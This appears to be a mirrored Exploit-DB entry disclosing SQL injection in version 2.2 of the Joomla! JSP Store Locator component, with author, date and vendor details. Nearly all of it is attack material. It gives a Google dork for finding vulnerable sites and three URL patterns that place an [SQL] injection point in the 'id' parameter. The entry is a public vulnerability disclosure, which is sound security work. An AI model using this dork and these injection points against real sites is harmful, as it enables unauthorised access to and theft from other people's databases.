Joomla! Component JSP Store Locator 2.2 – ‘id’ SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-02-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/41368/
  • # # # # # 
    # Exploit Title: Joomla! Component JSP Store Locator v2.2 - SQL Injection
    # Google Dork: inurl:index.php?option=com_jsplocation
    # Date: 15.02.2017
    # Vendor Homepage: http://joomlaserviceprovider.com
    # Software Buy: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/jsplocation/
    # Demo: http://demo.joomlaserviceprovider.com/index.php/joomla/extensions/jsp-location-classic-theme
    # Version: 2.2
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[@]ihsan[.]net
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/index.php?option=com_jsplocation&task=directionview&id=[SQL]
    # http://localhost/[PATH]/index.php?option=com_jsplocation&task=redirectviewinfo&id=[SQL]
    # http://localhost/[PATH]/index.php?option=com_jsplocation&view=classic&task=redirectviewinfo&id=[SQL]
    # Etc...
    # # # # #